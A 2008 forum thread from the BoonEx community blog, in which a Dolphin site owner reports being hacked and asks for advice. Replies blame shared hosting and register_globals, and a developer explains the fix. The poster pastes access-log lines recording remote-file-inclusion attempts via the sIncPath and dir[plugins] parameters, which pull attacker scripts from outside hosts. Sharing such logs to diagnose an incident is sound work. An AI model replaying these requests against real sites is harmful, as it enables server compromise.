Site Hacked

rednerus posted 27th of July 2008 in Community Voice. 9 comments.

To my surprise,One fine morning I saw my dolphin site (v 6.1.2) (which was hosted on ixweb shared hosting) hacked. All the files in /inc directory and all the profile images/music files/video files were removed.I did not take back up of my site for the past few days so I lost few members and pictures/videos/music of existing members.

Did anybody experience the same ??

When I look at the analytics I observed few visits from Nigeria/lagos on the same day and on virus scanning my dolphin site files after downloading I saw few files which were infected with virus. I found them in cache and langs folder and the files were named as

hp.php,msconfig.php,mode.php,hp.php,botnet.pl

I had to reinstall the whole site with the latest source (v6.1.4). Unfotunately I could not find the ip addresses of the nigerian visitors even from webalizer.

My question is with the security patch that was released recently would I be free from this type of hacks ??

I found a site @ http://www.wizcrafts.net/nigerian-blocklist.html and altered the .htaccess file in the root to block the traffic from nigeria.

Is there anything I could do to avoid this kind of attacks ?? any suggestions ?

 

 
Comments
·Oldest
·Top
Please login to post a comment.
sammie
sammie27th of July 2008
 
get a dedicated server or host with someone that has a dedicated server, there are a few of us that have a dedicated server and offer hosting, as we setup our servers for our dolphin sites, you can be assured that unlike shared hosting, we protect our own servers from hackers as much as we can.

shared hosts, setup their servers to accomidate for the masses, and leave huge security holes in them.
PermalinkReplyPlus0 pluses
lrepton
lrepton27th of July 2008
 
Yup....this morning it is down again at ixwebhosting.com! Webserver probs!!!!!!!

Even tho we have "dedicated" servers for our domain there, the database is on a "shared" server.

So, far I have not been hacked. (Crossed fingers) But I added the php.ini file suggested by many to alter the register globals that ixwebhosting has ON. (Should be OFF for security)
PermalinkReplyPlus0 pluses
DosDawg
DosDawg27th of July 2008
 
as noted on the blogs from boonex. there have been two releases that address security problems. but i take the stand sammie has, first of all, read the server requirements that boonex recommends, when you go against what the develper says, then you have to expect to have unpredictable outcomes. now beyond that, if you are on a server where register_globals are ON, then you are defying gravity itself, as stated by php.net, register_globals should be off, and developers should try to write their software see more so that register_globals are not required to be on.

now when you go to a host where by default, they have turned on register_globals, you have to see the red flags standing up in the air on that one. what happens, is that it doesnt necessarily have to be the dolphin suite that gets hacked, but the server itself, that is the vulnerability moreso than the script. once the server is compromised, the culprits will use whatever avenue they can to access sites and deface them, its a game to them, so one jamokey buys himself a $1.99 hosting account and all his little cronies then try their attacks, once they have a script that has the RFI exploit exposed, then they start posting this information. its not that any one individual pays the money, look at the sparce wan that was hit, most all kids who have a website, be it php or joomla or whatever, they are most likely on a shared server, then they have their clan, and as soon as they find a script with a hole, and its posted on the internet that there is a hole in the script, not otherwise accessible but for the script being hosted on a shared server. now what happens is that they load up a remote shell script (php) and they all get busy looking around in the server. why is it they dont get caught you say, well granted it is a shared server account, nobody really cares if the data gets lost of not from the hosting company, just as 100 $1.99 accounts leave, 100 $1.99 accounts come in the next day. this server is not monitored, and you are just fair game when you are on a shared hosting environment.

so yes, you can apply what patches you can find, you can upload the latest release, but to me this is only running on a wing and a prayer. you need to get to a minimum VPS and better than that is a Dedicated server. well i am done rambling

later,
DosDawg
PermalinkReplyPlus0 pluses
sammie
sammie28th of July 2008
 
you can not be on a dedicated server, you have your own box and your own database is on that box,
so you must be on shared hosting, if you have to use a database other than localhost.
godaddy have the same setup with their shared hosting, they have you use a database on another server,
PermalinkReplyPlus0 pluses
sammie
sammie28th of July 2008
 
this is a chat i had with your host:

i believe you are mixing a dedicated ip with a dedicated server, they do not have any VPS or dedicated servers on offer for hosting.

Chat InformationPlease wait for a site operator to respond.

Chat InformationYou are now chatting with 'Alex Golovko'

Alex Golovko: Hello, my name is Alex, please let me know how can I help you today?

you: hi, i was looking at your site and i do not see any dedcated servers or VPS

you: do you not offer either?

you: see more or are you just a shared hosting plan?

Alex Golovko: We're not providing dedicated or VSP servers sorry, all servers shared

you: ok thank you ever so much for your help, have a nice day

this comment is the killer:
We offer hosting on both Linux and Windows platforms. Our servers run ANY application you like!

hackers can run any application they like

love it
PermalinkReplyPlus0 pluses
gameutopia
gameutopia28th of July 2008
 
If they have register globals on with all there severs that seems odd. Maybe they are using a older version of php which could potentially be the cause of other Vulnerabilities. But that wouldn't make sense that they wouldn't just turn it off. Or possibly something with their setup in particular the software they run is an older script that requires register globals on. I don't know hspere that well, last time I checked that's what they were running. Or maybe their billing/automation script requires see more this. It does seem kind of odd that a fairly large host like ixwebhosting hasn't had other problems related to register globals on and made some adjustments.
PermalinkReplyPlus0 pluses
sammie
sammie28th of July 2008to gameutopia
 
this comment is the killer:
We offer hosting on both Linux and Windows platforms. Our servers run ANY application you like!

hackers can run any application they like

love it

you missed that part, to run any app you need to have register globals on.

they are telling you that anyone can run anything on their shared servers,

they do not have any other servers, all are shared, all are setup to run any app you want,.

thats register globals on all their servers.

they blame the hacking see more on the scripts,. not their hosting practices.
little you gets hacked, they tell you to patch your script, it aint thier fault.
lmfao
PermalinkReplyPlus0 pluses
rednerus
rednerus28th of July 2008
 
Thanks sammie,DosDawg,gameutopia for your inputs.
I would certainly go for a dedicated server once the site becomes bit busy. I would atleast go for a VPS for now but I am still not convinced that I would be safe either.I have chosen IX after knowing that it was one of the best sites and I host several of my other websites over there now.I think I will have to change the host now.
I looked at the log files and found these
189.112.40.11 - - [24/Jul/2008:21:36:06 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem1/jovemNOR.txt? see more HTTP/1.1" 200 98 "-" "Mozilla/3.0 (compatible; Indy Library)"
216.206.238.35 - - [24/Jul/2008:21:50:23 -0500] "GET /?sIncPath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 98 "-" "libwww-perl/5.803"
148.223.69.2 - - [24/Jul/2008:21:53:28 -0500] "GET //?sIncPath=http://hibbard22.net/id.txt? HTTP/1.1" 200 98 "-" "libwww-perl/5.805"
189.112.40.11 - - [24/Jul/2008:22:12:43 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem2/id.txt? HTTP/1.1" 200 98 "-" "Mozilla/3.0 (compatible; Indy Library)"
98.129.33.59 - - [24/Jul/2008:22:27:29 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"
67.205.76.81 - - [24/Jul/2008:22:27:07 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt??? HTTP/1.1" 200 371 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 302 5 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 15239 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:50 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:50 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:56 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt??? HTTP/1.1" 200 371 "-" "libwww-perl/5.810"
98.129.33.59 - - [24/Jul/2008:22:28:43 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"
216.246.91.250 - - [24/Jul/2008:22:28:44 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.810"
216.246.91.250 - - [24/Jul/2008:22:28:04 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.810"
98.129.33.59 - - [24/Jul/2008:22:30:32 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:32 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:30:40 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:41 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:41 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:30:48 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:40:22 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:40:22 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:40:30 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
82.128.9.68 - - [25/Jul/2008:04:59:49 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2F6babe.dk%2Fst%2Fc.txt%3F&act=img&img=back HTTP/1.1" 200 131 "//plugins/safehtml/safehtml.php?dir[plugins]=http://6babe.dk/st/c.txt?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
82.128.9.68 - - [25/Jul/2008:04:59:50 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2F6babe.dk%2Fst%2Fc.txt%3F&act=img&img=home HTTP/1.1" 200 221 "//plugins/safehtml/safehtml.php?dir[plugins]=http://6babe.dk/st/c.txt?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
PermalinkReplyPlus0 pluses
AndreyP
AndreyP28th of July 2008
 
1. If you will have register globals in Off
such injections will impossible
xxx.php?sIncPath=unwanted_code_path

2. since 6.1.4 we always re-setup all variables before using, so in even don`t will get incoming params

3. we don`t use global $dir more in not-safe places
PermalinkReplyPlus0 pluses
 
 
Home
Features
Pricing
Hosting
Support
About
StartDemo
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.

Blogs

Dolphin.Pro News
BoonEx News
Our Journey
Social Software World
Community Voice

Help

Support Forums
Documentation
BoonEx at GitHub
Custom Jobs
Contact Support Team

Product

Dolphin.Pro Features
Live Demo & Sandbox
Download Packages
Pricing & Order
Contact Sales Team

Company

Contact Us
About BoonEx
Privacy Policy
Terms & Conditions
© BoonEx Pty Ltd
SSL
© BoonEx
Home
Features
Pricing
Support
Hosting
About
Demo
PET:0.057971954345703